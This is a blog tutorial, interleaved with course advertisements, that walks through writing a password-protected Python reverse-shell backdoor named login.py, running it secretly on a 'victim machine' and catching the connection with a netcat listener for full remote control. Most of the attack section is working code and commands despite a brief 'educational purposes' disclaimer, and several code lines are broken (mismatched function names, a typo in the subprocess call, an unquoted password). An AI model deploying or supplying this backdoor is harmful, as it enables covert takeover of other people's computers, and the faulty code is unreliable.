Create a Backdoor Shell in Python

So we’ve delved into Python before, but this post should be a bit more interesting. What we will do today is write a backdoor in Python and if you manage to install this backdoor on anyone’s computer, you will have a shell to that computer from your own.

As always, these posts are for educational purposes and you should not try this on anyone’s devices but your own.

$299 REGISTERS YOU FOR OUR NEWEST SELF PACED COURSE! LFD201 – INTRODUCTION TO OPEN SOURCE DEVELOPMENT, GIT, AND LINUX!

Firstly you will need Python installed on your machine, happily this is already installed on most Linux distros, but for Windows you will need to download and install it from here.

Open a shell and use your favorite text editor to create a new file called login.py.

nano login.py

Cool, now let’s get coding shall we?

First it’s shebang and imports.

#! /usr/bin/python

import subprocess

import socket

So we are importing libraries here, the first one, subprocess is going to allow us to  execute a process from within our Python script, and this is how we will be able to process commands.

Next we have the socket library, this helps us to work with and manipulate socket data. This is how devices communicate over the internet, through sockets.

 

 

 

 

ENROLL TODAY IN THE SELF PACED COURSE – LFS263 – ONAP FUNDAMENTALS FOR $199!

Next we need to make some variables.

So we need a host, our attacking machine (this is the IP we want our reverse shell to go to), the port we want to listen on and a password that will be used to protect the backdoor. So only you will be able to use this program.

host = "127.0.0.1"

port = 443

passwd = whateveryouwant

Keep that password, because that’s what will get you access in the future.

Next we need some methods, first of all the login method. This is going to check any user that connects to the backdoor and see if the password they use is valid or not. If they use a bad password it will give the user a redirect back to the login.

$199 ENROLLS YOU INTO OUR SELF PACED COURSE – LFS264 – OPNFV FUNDAMENTALS!

If the password is valid we get a command prompt and call a shell method, are you following along so far? 😉

def login():

       global s

       s.send("login: ")

       pwd = s.recv(1024)



       if pwd.strip() !=passwd:

             Login()

        else:

              s.send("Connected #> ")

              Shell()

Perfect. The (s) we used was a global variable and we will be using that later in the code so that we can access our sockets from anywhere in the application.

Also, we used if pwd.strip() which will strip any white spaces from what the user types.

 

 

 

So let’s code the shell method, this will tell the rest of the code what to do once the correct password is provided. What we want is to run the code for infinity so we can login at any time.

So we grab any data that’s typed and store into a variable called data and we will call this through the code.

We will also use a KILL option in case we want to stop the program at any time in the future.

ENROLL IN THE LINUX FOUNDATION LFC210 – FUNDAMENTALS OF PROFESSIONAL OPEN SOURCE MANAGEMENT TODAY! $179

We will then run a subprocess, a program within a program, yup, let’s do it. Our data variable is going to be the variable that connects us back to the socket we created earlier.

def Shell():

       while True:

                         data = s.recv(1024)

                          if data.strip() == ' :kill':

                                break

                         proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin-subprocess.PIPE)

                         output = proc.stdout.read() + proc.stderr.read()

                         s.send(output)

                         s.send(" #> ")

Wonderful!! Isn’t coding magnificent? 😀

Now we need to code our connection back to our attacking machine. Here we will use the (s) variable again.

s  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host, port))

Login()

Well done, you just coded a backdoor only you can connect to 😉 We hope you managed to get a connection from your different virtual machines with this backdoor.

ENROLL TODAY IN THE DevOps Fundamentals: Implementing Continuous Delivery SELF PACED COURSE! $199

So let’s test it, once you have the backdoor installed on your device, let’s connect to it via our Kali machine. We need a listening tool to listen for any incoming connections.

So we can use netcat that is pre-installed on Kali. Let’s listen on port 443 as our code has instructed.

nc -lvp 443

listen

Next we just need to execute the Python script on the victim machine, so let’s do that.

./login.py

That will run the backdoor secretly in the background. So let’s see the results on our attack computer.

listen1

There we go, we have a connection, enter your super secret creds that you used earlier and you have full control of the server/machine/IOT device.

We have posted earlier how you might infect another device here.

Thanks for reading, please subscribe if you liked the content and be sure to come back for more tutorials in the future 👍👍👍👍

Also comment if you found this post useful.

QuBits 2019-09-28

LFD432

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.